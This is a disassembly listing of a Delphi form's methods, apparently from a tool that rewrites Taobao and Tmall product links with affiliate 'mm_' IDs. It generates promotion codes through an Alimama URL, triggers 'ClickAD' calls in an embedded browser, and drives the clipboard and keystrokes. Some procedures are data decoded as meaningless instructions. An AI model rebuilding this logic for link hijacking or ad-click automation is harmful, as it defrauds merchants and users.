004BC9E2 8BC6 mov eax, esi
|
004BC9E4 E86BA8F4FF call 00407254
004BC9E9 8B4508 mov eax, [ebp+$08]
004BC9EC 66C7000000 mov word ptr [eax], $0000
004BC9F1 33C0 xor eax, eax
004BC9F3 5A pop edx
004BC9F4 59 pop ecx
004BC9F5 59 pop ecx
004BC9F6 648910 mov fs:[eax], edx
004BC9F9 EB12 jmp 004BCA0D
|
004BC9FB E92880F4FF jmp 00404A28
004BCA00 8B4508 mov eax, [ebp+$08]
004BCA03 66C700FFFF mov word ptr [eax], $FFFF
|
004BCA08 E82B84F4FF call 00404E38
****** END
|
004BCA0D 33C0 xor eax, eax
004BCA0F 5A pop edx
004BCA10 59 pop ecx
004BCA11 59 pop ecx
004BCA12 648910 mov fs:[eax], edx
****** FINALLY
|
004BCA15 6835CA4B00 push $004BCA35
004BCA1A 8D45F8 lea eax, [ebp-$08]
* Reference to object IDispatch
|
004BCA1D 8B15B8114000 mov edx, [$004011B8]
004BCA23 B902000000 mov ecx, $00000002
|
004BCA28 E80B97F4FF call 00406138
004BCA2D C3 ret
|
004BCA2E E9A982F4FF jmp 00404CDC
004BCA33 EBE5 jmp 004BCA1A
****** END
|
004BCA35 5F pop edi
004BCA36 5E pop esi
004BCA37 5B pop ebx
004BCA38 59 pop ecx
004BCA39 59 pop ecx
004BCA3A 5D pop ebp
004BCA3B C20400 ret $0004
*)
end;
procedure Tfrm_SSMoon._PROC_004BA92A(Sender : TObject);
begin
(*
004BA92A 00C0 add al, al
004BA92C 4F dec edi
004BA92D D901 fld dword ptr [ecx]
004BA92F 196116 sbb [ecx+$16], esp
004BA932 0CD3 or al, $D3
004BA934 AF scasd
004BA935 CDD0 int $D0
004BA937 118A3E00C04F adc [edx+$4FC0003E], ecx
004BA93D C9 leave
004BA93E E26E loop +$6E
004BA940 05DF020000 add eax, +$000002DF
004BA945 0000 add [eax], al
*)
end;
procedure Tfrm_SSMoon._PROC_004BA961(Sender : TObject);
begin
(*
004BA961 8BEC mov ebp, esp
004BA963 33C9 xor ecx, ecx
004BA965 51 push ecx
004BA966 51 push ecx
004BA967 51 push ecx
004BA968 51 push ecx
004BA969 51 push ecx
004BA96A 51 push ecx
004BA96B 51 push ecx
004BA96C 53 push ebx
004BA96D 56 push esi
004BA96E 57 push edi
004BA96F 8BF0 mov esi, eax
004BA971 33C0 xor eax, eax
004BA973 55 push ebp
004BA974 6826AA4B00 push $004BAA26
***** TRY
|
004BA979 64FF30 push dword ptr fs:[eax]
004BA97C 648920 mov fs:[eax], esp
004BA97F C645FF01 mov byte ptr [ebp-$01], $01
004BA983 33C0 xor eax, eax
004BA985 55 push ebp
* Possible String Reference to: '?狋艵'
|
004BA986 68F2A94B00 push $004BA9F2
***** TRY
|
004BA98B 64FF30 push dword ptr fs:[eax]
004BA98E 648920 mov fs:[eax], esp
004BA991 833D64DD4C0000 cmp dword ptr [$004CDD64], +$00
004BA998 744A jz 004BA9E4
004BA99A 8D45EC lea eax, [ebp-$14]
|
004BA99D E8AE77F5FF call 00412150
004BA9A2 50 push eax
004BA9A3 683CAA4B00 push $004BAA3C
* Possible String Reference to: 'ClickAD("'
|
004BA9A8 685CAA4B00 push $004BAA5C
004BA9AD 56 push esi
* Possible String Reference to: '");'
|
004BA9AE 6870AA4B00 push $004BAA70
004BA9B3 8D45E4 lea eax, [ebp-$1C]
004BA9B6 BA03000000 mov edx, $00000003
|
004BA9BB E8C8AEF4FF call 00405888
004BA9C0 8B55E4 mov edx, [ebp-$1C]
004BA9C3 8D45E8 lea eax, [ebp-$18]
|
004BA9C6 E891B4F4FF call 00405E5C
004BA9CB 8B45E8 mov eax, [ebp-$18]
004BA9CE 50 push eax
004BA9CF A164DD4C00 mov eax, dword ptr [$004CDD64]
004BA9D4 50 push eax
004BA9D5 8B00 mov eax, [eax]
004BA9D7 FF9010010000 call dword ptr [eax+$0110]
|
004BA9DD E86AC9F4FF call 0040734C
004BA9E2 EB04 jmp 004BA9E8
004BA9E4 C645FF00 mov byte ptr [ebp-$01], $00
004BA9E8 33C0 xor eax, eax
004BA9EA 5A pop edx
004BA9EB 59 pop ecx
004BA9EC 59 pop ecx
004BA9ED 648910 mov fs:[eax], edx
004BA9F0 EB0E jmp 004BAA00
|
004BA9F2 E931A0F4FF jmp 00404A28
004BA9F7 C645FF00 mov byte ptr [ebp-$01], $00
|
004BA9FB E838A4F4FF call 00404E38
****** END
|
004BAA00 33C0 xor eax, eax
004BAA02 5A pop edx
004BAA03 59 pop ecx
004BAA04 59 pop ecx
004BAA05 648910 mov fs:[eax], edx
****** FINALLY
|
004BAA08 682DAA4B00 push $004BAA2D
004BAA0D 8D45E4 lea eax, [ebp-$1C]
|
004BAA10 E8DFAAF4FF call 004054F4
004BAA15 8D45E8 lea eax, [ebp-$18]
|
004BAA18 E8DFB2F4FF call 00405CFC
004BAA1D 8D45EC lea eax, [ebp-$14]
|
004BAA20 E82B77F5FF call 00412150
004BAA25 C3 ret
|
004BAA26 E9B1A2F4FF jmp 00404CDC
004BAA2B EBE0 jmp 004BAA0D
****** END
|
004BAA2D 0FB645FF movzx eax, byte ptr [ebp-$01]
004BAA31 5F pop edi
004BAA32 5E pop esi
004BAA33 5B pop ebx
004BAA34 8BE5 mov esp, ebp
004BAA36 5D pop ebp
004BAA37 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BAA38(Sender : TObject);
begin
(*
004BAA38 1400 adc al, $00
004BAA3A 0000 add [eax], al
*)
end;
procedure Tfrm_SSMoon._PROC_004BAA95(Sender : TObject);
begin
(*
004BAA95 8BEC mov ebp, esp
004BAA97 33C9 xor ecx, ecx
004BAA99 51 push ecx
004BAA9A 51 push ecx
004BAA9B 51 push ecx
004BAA9C 51 push ecx
004BAA9D 51 push ecx
004BAA9E 51 push ecx
004BAA9F 51 push ecx
004BAAA0 53 push ebx
004BAAA1 56 push esi
004BAAA2 33C0 xor eax, eax
004BAAA4 55 push ebp
* Possible String Reference to: '閟狋脎^[嬪]?
|
004BAAA5 6864AC4B00 push $004BAC64
***** TRY
|
004BAAAA 64FF30 push dword ptr fs:[eax]
004BAAAD 648920 mov fs:[eax], esp
004BAAB0 A178674C00 mov eax, dword ptr [$004C6778]
004BAAB5 833800 cmp dword ptr [eax], +$00
004BAAB8 0F847B010000 jz 004BAC39
* Reference to: user32.GetForegroundWindow()
|
004BAABE E895D7F4FF call 00408258
004BAAC3 8BF0 mov esi, eax
004BAAC5 A154DD4C00 mov eax, dword ptr [$004CDD54]
|
004BAACA E8D14EF9FF call 0044F9A0
004BAACF 50 push eax
* Reference to: user32.SetForegroundWindow()
|
004BAAD0 E873DAF4FF call 00408548
004BAAD5 8D45FC lea eax, [ebp-$04]
|
004BAAD8 E85FC7F4FF call 0040723C
004BAADD 50 push eax
004BAADE 8D4DF8 lea ecx, [ebp-$08]
004BAAE1 A154DD4C00 mov eax, dword ptr [$004CDD54]
* Reference to control webb2 : TWebBrowser
|
004BAAE6 8B8074030000 mov eax, [eax+$0374]
004BAAEC BACB000000 mov edx, $000000CB
* Reference to : TOleControl._PROC_0046CE4C()
|
004BAAF1 E85623FBFF call 0046CE4C
004BAAF6 8B45F8 mov eax, [ebp-$08]
004BAAF9 50 push eax
004BAAFA 8B00 mov eax, [eax]
004BAAFC FF90B0010000 call dword ptr [eax+$01B0]
|
004BAB02 E845C8F4FF call 0040734C
004BAB07 8B45FC mov eax, [ebp-$04]
004BAB0A 50 push eax
004BAB0B 8B00 mov eax, [eax]
004BAB0D FF90EC000000 call dword ptr [eax+$00EC]
|
004BAB13 E834C8F4FF call 0040734C
* Possible String Reference to: '{TAB '
|
004BAB18 687CAC4B00 push $004BAC7C
004BAB1D 8D55F0 lea edx, [ebp-$10]
004BAB20 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BAB25 8B8088030000 mov eax, [eax+$0388]
004BAB2B 8B402C mov eax, [eax+$2C]
|
004BAB2E E8D9F6F4FF call 0040A20C
004BAB33 FF75F0 push dword ptr [ebp-$10]
004BAB36 688CAC4B00 push $004BAC8C
004BAB3B 8D45F4 lea eax, [ebp-$0C]
004BAB3E BA03000000 mov edx, $00000003
|
004BAB43 E840ADF4FF call 00405888
004BAB48 8B45F4 mov eax, [ebp-$0C]
|
004BAB4B E834AEF4FF call 00405984
004BAB50 33D2 xor edx, edx
|
004BAB52 E87932FFFF call 004ADDD0
004BAB57 B201 mov dl, $01
* Reference to class TClipboard
|
004BAB59 A118934300 mov eax, dword ptr [$00439318]
|
004BAB5E E8B599F4FF call 00404518
004BAB63 8BD8 mov ebx, eax
004BAB65 8D55EC lea edx, [ebp-$14]
004BAB68 8BC3 mov eax, ebx
* Reference to : TClipboard._PROC_0043959C()
|
004BAB6A E82DEAF7FF call 0043959C
004BAB6F 8B55EC mov edx, [ebp-$14]
004BAB72 B874DD4C00 mov eax, $004CDD74
|
004BAB77 E8CCA9F4FF call 00405548
004BAB7C 8BC3 mov eax, ebx
004BAB7E 8B10 mov edx, [eax]
* Possible reference to virtual method TClipboard.OFFS_18
|
004BAB80 FF5218 call dword ptr [edx+$18]
004BAB83 8BC3 mov eax, ebx
004BAB85 8B10 mov edx, [eax]
* Possible reference to virtual method TClipboard.OFFS_10
|
004BAB87 FF5210 call dword ptr [edx+$10]
004BAB8A 8B1578674C00 mov edx, [$004C6778]
004BAB90 8B12 mov edx, [edx]
004BAB92 8BC3 mov eax, ebx
* Reference to : TClipboard._PROC_0043961C()
|
004BAB94 E883EAF7FF call 0043961C
* Possible String Reference to: '^v'
|
004BAB99 B890AC4B00 mov eax, $004BAC90
004BAB9E 33D2 xor edx, edx
|
004BABA0 E82B32FFFF call 004ADDD0
004BABA5 8BC3 mov eax, ebx
004BABA7 8B10 mov edx, [eax]
* Possible reference to virtual method TClipboard.OFFS_14
|
004BABA9 FF5214 call dword ptr [edx+$14]
004BABAC 8BC3 mov eax, ebx
|
004BABAE E89599F4FF call 00404548
* Possible String Reference to: '{TAB '
|
004BABB3 687CAC4B00 push $004BAC7C
004BABB8 8D55E4 lea edx, [ebp-$1C]
004BABBB A154DD4C00 mov eax, dword ptr [$004CDD54]
004BABC0 8B8088030000 mov eax, [eax+$0388]
004BABC6 8B4030 mov eax, [eax+$30]
|
004BABC9 E83EF6F4FF call 0040A20C
004BABCE FF75E4 push dword ptr [ebp-$1C]
004BABD1 688CAC4B00 push $004BAC8C
004BABD6 8D45E8 lea eax, [ebp-$18]
004BABD9 BA03000000 mov edx, $00000003
|
004BABDE E8A5ACF4FF call 00405888
004BABE3 8B45E8 mov eax, [ebp-$18]
|
004BABE6 E899ADF4FF call 00405984
004BABEB 33D2 xor edx, edx
|
004BABED E8DE31FFFF call 004ADDD0
004BABF2 B020 mov al, $20
|
004BABF4 E87BFEFFFF call 004BAA74
* Reference to: kernel32.GetTickCount()
|
004BABF9 E8C2D0F4FF call 00407CC0
004BABFE 8BD8 mov ebx, eax
* Reference to: kernel32.GetTickCount()
|
004BAC00 E8BBD0F4FF call 00407CC0
004BAC05 33D2 xor edx, edx
004BAC07 52 push edx
004BAC08 50 push eax
004BAC09 8BC3 mov eax, ebx
004BAC0B 99 cdq
004BAC0C 290424 sub dword ptr [esp], eax
004BAC0F 19542404 sbb [esp+$04], edx
004BAC13 58 pop eax
004BAC14 5A pop edx
004BAC15 83FA00 cmp edx, +$00
004BAC18 7509 jnz 004BAC23
004BAC1A 3DE8030000 cmp eax, $000003E8
004BAC1F 7604 jbe 004BAC25
004BAC21 EB10 jmp 004BAC33
004BAC23 7F0E jnle 004BAC33
004BAC25 A12C664C00 mov eax, dword ptr [$004C662C]
004BAC2A 8B00 mov eax, [eax]
|
004BAC2C E857B7FAFF call 00466388
004BAC31 EBCD jmp 004BAC00
004BAC33 56 push esi
* Reference to: user32.SetForegroundWindow()
|
004BAC34 E80FD9F4FF call 00408548
004BAC39 33C0 xor eax, eax
004BAC3B 5A pop edx
004BAC3C 59 pop ecx
004BAC3D 59 pop ecx
004BAC3E 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '^[嬪]?
|
004BAC41 686BAC4B00 push $004BAC6B
004BAC46 8D45E4 lea eax, [ebp-$1C]
004BAC49 BA05000000 mov edx, $00000005
|
004BAC4E E8C5A8F4FF call 00405518
004BAC53 8D45F8 lea eax, [ebp-$08]
|
004BAC56 E8E1C5F4FF call 0040723C
004BAC5B 8D45FC lea eax, [ebp-$04]
|
004BAC5E E8D9C5F4FF call 0040723C
004BAC63 C3 ret
|
004BAC64 E973A0F4FF jmp 00404CDC
004BAC69 EBDB jmp 004BAC46
****** END
|
004BAC6B 5E pop esi
004BAC6C 5B pop ebx
004BAC6D 8BE5 mov esp, ebp
004BAC6F 5D pop ebp
004BAC70 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BACE1(Sender : TObject);
begin
(*
004BACE1 EA048B1285 jmp $85128B04
004BACE6 D27E1B sar byte ptr [esi+$1B], cl
004BACE9 BE01000000 mov esi, $00000001
004BACEE 0FB64C37FF movzx ecx, byte ptr [edi+esi-$01]
004BACF3 80C1D0 add cl, $D0
004BACF6 80E90A sub cl, $0A
004BACF9 7205 jb 004BAD00
004BACFB 33C0 xor eax, eax
004BACFD 5F pop edi
004BACFE 5E pop esi
004BACFF C3 ret
004BAD00 46 inc esi
004BAD01 4A dec edx
004BAD02 75EA jnz 004BACEE
004BAD04 5F pop edi
004BAD05 5E pop esi
004BAD06 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BAD08(Sender : TObject);
begin
(*
004BAD08 53 push ebx
004BAD09 8BD8 mov ebx, eax
004BAD0B 8BD3 mov edx, ebx
* Possible String Reference to: 'mm_'
|
004BAD0D B83CAD4B00 mov eax, $004BAD3C
|
004BAD12 E8B9ADF4FF call 00405AD0
004BAD17 85C0 test eax, eax
004BAD19 7E10 jle 004BAD2B
004BAD1B 8BD3 mov edx, ebx
* Possible String Reference to: '_0_0'
|
004BAD1D B848AD4B00 mov eax, $004BAD48
|
004BAD22 E8A9ADF4FF call 00405AD0
004BAD27 85C0 test eax, eax
004BAD29 7F04 jnle 004BAD2F
004BAD2B 33C0 xor eax, eax
004BAD2D 5B pop ebx
004BAD2E C3 ret
004BAD2F B001 mov al, $01
004BAD31 5B pop ebx
004BAD32 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BAD51(Sender : TObject);
begin
(*
004BAD51 8BEC mov ebp, esp
004BAD53 83C4B0 add esp, -$50
004BAD56 53 push ebx
004BAD57 56 push esi
004BAD58 57 push edi
004BAD59 33DB xor ebx, ebx
004BAD5B 895DB0 mov [ebp-$50], ebx
004BAD5E 895DB4 mov [ebp-$4C], ebx
004BAD61 895DB8 mov [ebp-$48], ebx
004BAD64 895DBC mov [ebp-$44], ebx
004BAD67 895DD0 mov [ebp-$30], ebx
004BAD6A 895DFC mov [ebp-$04], ebx
004BAD6D 895DF8 mov [ebp-$08], ebx
004BAD70 895DF4 mov [ebp-$0C], ebx
004BAD73 895DF0 mov [ebp-$10], ebx
004BAD76 894DE8 mov [ebp-$18], ecx
004BAD79 8955EC mov [ebp-$14], edx
004BAD7C 8BF0 mov esi, eax
004BAD7E 33C0 xor eax, eax
004BAD80 55 push ebp
004BAD81 6892B14B00 push $004BB192
***** TRY
|
004BAD86 64FF30 push dword ptr fs:[eax]
004BAD89 648920 mov fs:[eax], esp
004BAD8C 8B45E8 mov eax, [ebp-$18]
|
004BAD8F E860A7F4FF call 004054F4
004BAD94 8BD6 mov edx, esi
* Possible String Reference to: 'mm_'
|
004BAD96 B8A8B14B00 mov eax, $004BB1A8
|
004BAD9B E830ADF4FF call 00405AD0
004BADA0 8BD8 mov ebx, eax
004BADA2 85DB test ebx, ebx
004BADA4 7E3B jle 004BADE1
004BADA6 8BD6 mov edx, esi
* Possible String Reference to: '_0_0'
|
004BADA8 B8B4B14B00 mov eax, $004BB1B4
|
004BADAD E81EADF4FF call 00405AD0
004BADB2 8BF8 mov edi, eax
004BADB4 85FF test edi, edi
004BADB6 0F8EA6030000 jle 004BB162
004BADBC 8D45F4 lea eax, [ebp-$0C]
004BADBF 50 push eax
004BADC0 8BCF mov ecx, edi
004BADC2 2BCB sub ecx, ebx
004BADC4 83E903 sub ecx, +$03
004BADC7 8D5303 lea edx, [ebx+$03]
004BADCA 8BC6 mov eax, esi
|
004BADCC E81BACF4FF call 004059EC
004BADD1 8B45F4 mov eax, [ebp-$0C]
|
004BADD4 E8BBFEFFFF call 004BAC94
004BADD9 84C0 test al, al
004BADDB 0F8581030000 jnz 004BB162
004BADE1 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BADE6 8B8088030000 mov eax, [eax+$0388]
004BADEC 8B4018 mov eax, [eax+$18]
004BADEF 8B10 mov edx, [eax]
004BADF1 FF5214 call dword ptr [edx+$14]
004BADF4 85C0 test eax, eax
004BADF6 0F8E66030000 jle 004BB162
004BADFC 8D45F8 lea eax, [ebp-$08]
004BADFF 8BD6 mov edx, esi
|
004BAE01 E886A7F4FF call 0040558C
004BAE06 8BD6 mov edx, esi
* Possible String Reference to: 'item.tmall.com/item.htm?id='
|
004BAE08 B8C4B14B00 mov eax, $004BB1C4
|
004BAE0D E8BEACF4FF call 00405AD0
004BAE12 85C0 test eax, eax
004BAE14 7F34 jnle 004BAE4A
004BAE16 8BD6 mov edx, esi
* Possible String Reference to: 'item.tmall.com/auction/item_detail.
| htm?item_num_id='
|
004BAE18 B8E8B14B00 mov eax, $004BB1E8
|
004BAE1D E8AEACF4FF call 00405AD0
004BAE22 85C0 test eax, eax
004BAE24 7F24 jnle 004BAE4A
004BAE26 8BD6 mov edx, esi
* Possible String Reference to: 'item.taobao.com/item.htm?id='
|
004BAE28 B824B24B00 mov eax, $004BB224
|
004BAE2D E89EACF4FF call 00405AD0
004BAE32 85C0 test eax, eax
004BAE34 7F14 jnle 004BAE4A
004BAE36 8BD6 mov edx, esi
* Possible String Reference to: 'item.taobao.com/auction/item_detail
| .htm?item_num_id='
|
004BAE38 B84CB24B00 mov eax, $004BB24C
|
004BAE3D E88EACF4FF call 00405AD0
004BAE42 85C0 test eax, eax
004BAE44 0F8E18030000 jle 004BB162
004BAE4A 8BD6 mov edx, esi
004BAE4C B88CB24B00 mov eax, $004BB28C
|
004BAE51 E87AACF4FF call 00405AD0
004BAE56 8BD8 mov ebx, eax
004BAE58 85DB test ebx, ebx
004BAE5A 7522 jnz 004BAE7E
004BAE5C 8BDE mov ebx, esi
004BAE5E 85DB test ebx, ebx
004BAE60 7405 jz 004BAE67
004BAE62 83EB04 sub ebx, +$04
004BAE65 8B1B mov ebx, [ebx]
004BAE67 8D45F8 lea eax, [ebp-$08]
004BAE6A 50 push eax
004BAE6B 8BCB mov ecx, ebx
004BAE6D 83E907 sub ecx, +$07
004BAE70 BA08000000 mov edx, $00000008
004BAE75 8BC6 mov eax, esi
|
004BAE77 E870ABF4FF call 004059EC
004BAE7C EB15 jmp 004BAE93
004BAE7E 8D45F8 lea eax, [ebp-$08]
004BAE81 50 push eax
004BAE82 8BCB mov ecx, ebx
004BAE84 83E908 sub ecx, +$08
004BAE87 BA08000000 mov edx, $00000008
004BAE8C 8BC6 mov eax, esi
|
004BAE8E E859ABF4FF call 004059EC
004BAE93 8D55C0 lea edx, [ebp-$40]
004BAE96 8B45F8 mov eax, [ebp-$08]
|
004BAE99 E80E85FFFF call 004B33AC
004BAE9E 8D45C0 lea eax, [ebp-$40]
004BAEA1 8D55D0 lea edx, [ebp-$30]
|
004BAEA4 E87B85FFFF call 004B3424
004BAEA9 8B55D0 mov edx, [ebp-$30]
004BAEAC A154DD4C00 mov eax, dword ptr [$004CDD54]
004BAEB1 8B8088030000 mov eax, [eax+$0388]
004BAEB7 8B4014 mov eax, [eax+$14]
004BAEBA 8B08 mov ecx, [eax]
004BAEBC FF5154 call dword ptr [ecx+$54]
004BAEBF 8BD8 mov ebx, eax
004BAEC1 83FBFF cmp ebx, -$01
004BAEC4 0F851F020000 jnz 004BB0E9
004BAECA 8B55F8 mov edx, [ebp-$08]
004BAECD B898B24B00 mov eax, $004BB298
|
004BAED2 E8F9ABF4FF call 00405AD0
004BAED7 8BF8 mov edi, eax
004BAED9 85FF test edi, edi
004BAEDB 0F8E81020000 jle 004BB162
004BAEE1 8B45F8 mov eax, [ebp-$08]
004BAEE4 8945D4 mov [ebp-$2C], eax
004BAEE7 837DD400 cmp dword ptr [ebp-$2C], +$00
004BAEEB 740B jz 004BAEF8
004BAEED 8B45D4 mov eax, [ebp-$2C]
004BAEF0 83E804 sub eax, +$04
004BAEF3 8B00 mov eax, [eax]
004BAEF5 8945D4 mov [ebp-$2C], eax
004BAEF8 8D45F0 lea eax, [ebp-$10]
004BAEFB 50 push eax
004BAEFC 8B4DD4 mov ecx, [ebp-$2C]
004BAEFF 2BCB sub ecx, ebx
004BAF01 8D5701 lea edx, [edi+$01]
004BAF04 8B45F8 mov eax, [ebp-$08]
|
004BAF07 E8E0AAF4FF call 004059EC
004BAF0C 837DF000 cmp dword ptr [ebp-$10], +$00
004BAF10 0F844C020000 jz 004BB162
004BAF16 8B45F0 mov eax, [ebp-$10]
|
004BAF19 E8B6FDFFFF call 004BACD4
004BAF1E 84C0 test al, al
004BAF20 0F843C020000 jz 004BB162
004BAF26 833D64DD4C0000 cmp dword ptr [$004CDD64], +$00
004BAF2D 0F842F020000 jz 004BB162
004BAF33 B868DD4C00 mov eax, $004CDD68
004BAF38 8B55F8 mov edx, [ebp-$08]
|
004BAF3B E808A6F4FF call 00405548
004BAF40 B201 mov dl, $01
* Reference to class TStringList
|
004BAF42 A1A8AA4100 mov eax, dword ptr [$0041AAA8]
|
004BAF47 E8CC95F4FF call 00404518
004BAF4C 8945E4 mov [ebp-$1C], eax
004BAF4F B201 mov dl, $01
* Reference to class TStringList
|
004BAF51 A1A8AA4100 mov eax, dword ptr [$0041AAA8]
|
004BAF56 E8BD95F4FF call 00404518
004BAF5B 8945E0 mov [ebp-$20], eax
004BAF5E 8D45BC lea eax, [ebp-$44]
004BAF61 8B4DF0 mov ecx, [ebp-$10]
* Possible String Reference to: 'auction_id='
|
004BAF64 BAA4B24B00 mov edx, $004BB2A4
|
004BAF69 E89EA8F4FF call 0040580C
004BAF6E 8B55BC mov edx, [ebp-$44]
004BAF71 8B45E4 mov eax, [ebp-$1C]
004BAF74 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_38
|
004BAF76 FF5138 call dword ptr [ecx+$38]
004BAF79 8D45B8 lea eax, [ebp-$48]
004BAF7C 50 push eax
004BAF7D A154DD4C00 mov eax, dword ptr [$004CDD54]
* Reference to control IdHTTP : TIdHTTP
|
004BAF82 8B806C030000 mov eax, [eax+$036C]
004BAF88 8B4DE4 mov ecx, [ebp-$1C]
* Possible String Reference to: 'http://taoke.alimama.com/spreader/g
| en_auction_code.htm'
|
004BAF8B BAB8B24B00 mov edx, $004BB2B8
|
004BAF90 E80BA9FDFF call 004958A0
004BAF95 8B55B8 mov edx, [ebp-$48]
004BAF98 8B45E0 mov eax, [ebp-$20]
004BAF9B 8B08 mov ecx, [eax]
* Possible reference to virtual method TStringList.OFFS_2C
|
004BAF9D FF512C call dword ptr [ecx+$2C]
004BAFA0 8B45E0 mov eax, [ebp-$20]
004BAFA3 8B10 mov edx, [eax]
* Possible reference to virtual method TStringList.OFFS_14
|
004BAFA5 FF5214 call dword ptr [edx+$14]
004BAFA8 48 dec eax
004BAFA9 85C0 test eax, eax
004BAFAB 0F8C26010000 jl 004BB0D7
004BAFB1 40 inc eax
004BAFB2 8945D8 mov [ebp-$28], eax
004BAFB5 C745DC00000000 mov dword ptr [ebp-$24], $00000000
004BAFBC 8D4DFC lea ecx, [ebp-$04]
004BAFBF 8B55DC mov edx, [ebp-$24]
004BAFC2 8B45E0 mov eax, [ebp-$20]
004BAFC5 8B18 mov ebx, [eax]
* Possible reference to virtual method TStringList.OFFS_0C
|
004BAFC7 FF530C call dword ptr [ebx+$0C]
004BAFCA 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 'var urlcode ='
|
004BAFCD B8F8B24B00 mov eax, $004BB2F8
|
004BAFD2 E8F9AAF4FF call 00405AD0
004BAFD7 8BD8 mov ebx, eax
004BAFD9 85DB test ebx, ebx
004BAFDB 0F8EEA000000 jle 004BB0CB
004BAFE1 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 'http://'
|
004BAFE4 B810B34B00 mov eax, $004BB310
|
004BAFE9 E8E2AAF4FF call 00405AD0
004BAFEE 8BD8 mov ebx, eax
004BAFF0 85DB test ebx, ebx
004BAFF2 7F37 jnle 004BB02B
004BAFF4 8B45EC mov eax, [ebp-$14]
004BAFF7 33D2 xor edx, edx
004BAFF9 52 push edx
004BAFFA 50 push eax
004BAFFB 8D45B4 lea eax, [ebp-$4C]
|
004BAFFE E8F5F2F4FF call 0040A2F8
004BB003 8B55B4 mov edx, [ebp-$4C]
004BB006 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB00B 8B808C030000 mov eax, [eax+$038C]
004BB011 8B08 mov ecx, [eax]
004BB013 FF5138 call dword ptr [ecx+$38]
004BB016 8B45E4 mov eax, [ebp-$1C]
|
004BB019 E82A95F4FF call 00404548
004BB01E 8B45E0 mov eax, [ebp-$20]
|
004BB021 E82295F4FF call 00404548
004BB026 E9AC000000 jmp 004BB0D7
004BB02B 8D45FC lea eax, [ebp-$04]
004BB02E 50 push eax
004BB02F 8B55FC mov edx, [ebp-$04]
004BB032 B88CB24B00 mov eax, $004BB28C
|
004BB037 E894AAF4FF call 00405AD0
004BB03C 8BC8 mov ecx, eax
004BB03E 2BCB sub ecx, ebx
004BB040 8BD3 mov edx, ebx
004BB042 8B45FC mov eax, [ebp-$04]
|
004BB045 E8A2A9F4FF call 004059EC
004BB04A 8BC6 mov eax, esi
* Reference to : Tfrm_SSMoon._PROC_004BAD08()
|
004BB04C E8B7FCFFFF call 004BAD08
004BB051 84C0 test al, al
004BB053 7423 jz 004BB078
004BB055 FF75FC push dword ptr [ebp-$04]
* Possible String Reference to: '&p=mm_'
|
004BB058 6820B34B00 push $004BB320
004BB05D A110644C00 mov eax, dword ptr [$004C6410]
004BB062 FF30 push dword ptr [eax]
* Possible String Reference to: '_0_0&n=11'
|
004BB064 6830B34B00 push $004BB330
004BB069 8B45E8 mov eax, [ebp-$18]
004BB06C BA04000000 mov edx, $00000004
|
004BB071 E812A8F4FF call 00405888
004BB076 EB21 jmp 004BB099
004BB078 FF75FC push dword ptr [ebp-$04]
* Possible String Reference to: '&p=mm_'
|
004BB07B 6820B34B00 push $004BB320
004BB080 A138664C00 mov eax, dword ptr [$004C6638]
004BB085 FF30 push dword ptr [eax]
* Possible String Reference to: '_0_0&n=11'
|
004BB087 6830B34B00 push $004BB330
004BB08C 8B45E8 mov eax, [ebp-$18]
004BB08F BA04000000 mov edx, $00000004
|
004BB094 E8EFA7F4FF call 00405888
004BB099 6A01 push $01
004BB09B 8D55C0 lea edx, [ebp-$40]
004BB09E A168DD4C00 mov eax, dword ptr [$004CDD68]
|
004BB0A3 E80483FFFF call 004B33AC
004BB0A8 8D45C0 lea eax, [ebp-$40]
004BB0AB 8D55B0 lea edx, [ebp-$50]
|
004BB0AE E87183FFFF call 004B3424
004BB0B3 8B55B0 mov edx, [ebp-$50]
004BB0B6 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB0BB 8B8088030000 mov eax, [eax+$0388]
004BB0C1 8B4DFC mov ecx, [ebp-$04]
|
004BB0C4 E8D70AFFFF call 004ABBA0
004BB0C9 EB0C jmp 004BB0D7
004BB0CB FF45DC inc dword ptr [ebp-$24]
004BB0CE FF4DD8 dec dword ptr [ebp-$28]
004BB0D1 0F85E5FEFFFF jnz 004BAFBC
004BB0D7 8B45E4 mov eax, [ebp-$1C]
|
004BB0DA E86994F4FF call 00404548
004BB0DF 8B45E0 mov eax, [ebp-$20]
|
004BB0E2 E86194F4FF call 00404548
004BB0E7 EB79 jmp 004BB162
004BB0E9 8BC6 mov eax, esi
* Reference to : Tfrm_SSMoon._PROC_004BAD08()
|
004BB0EB E818FCFFFF call 004BAD08
004BB0F0 84C0 test al, al
004BB0F2 7438 jz 004BB12C
004BB0F4 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB0F9 8B8088030000 mov eax, [eax+$0388]
004BB0FF 8B4014 mov eax, [eax+$14]
004BB102 8BD3 mov edx, ebx
004BB104 8B08 mov ecx, [eax]
004BB106 FF5118 call dword ptr [ecx+$18]
004BB109 FF7008 push dword ptr [eax+$08]
* Possible String Reference to: '&p=mm_'
|
004BB10C 6820B34B00 push $004BB320
004BB111 A110644C00 mov eax, dword ptr [$004C6410]
004BB116 FF30 push dword ptr [eax]
* Possible String Reference to: '_0_0&n=11'
|
004BB118 6830B34B00 push $004BB330
004BB11D 8B45E8 mov eax, [ebp-$18]
004BB120 BA04000000 mov edx, $00000004
|
004BB125 E85EA7F4FF call 00405888
004BB12A EB36 jmp 004BB162
004BB12C A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB131 8B8088030000 mov eax, [eax+$0388]
004BB137 8B4014 mov eax, [eax+$14]
004BB13A 8BD3 mov edx, ebx
004BB13C 8B08 mov ecx, [eax]
004BB13E FF5118 call dword ptr [ecx+$18]
004BB141 FF7008 push dword ptr [eax+$08]
* Possible String Reference to: '&p=mm_'
|
004BB144 6820B34B00 push $004BB320
004BB149 A138664C00 mov eax, dword ptr [$004C6638]
004BB14E FF30 push dword ptr [eax]
* Possible String Reference to: '_0_0&n=11'
|
004BB150 6830B34B00 push $004BB330
004BB155 8B45E8 mov eax, [ebp-$18]
004BB158 BA04000000 mov edx, $00000004
|
004BB15D E826A7F4FF call 00405888
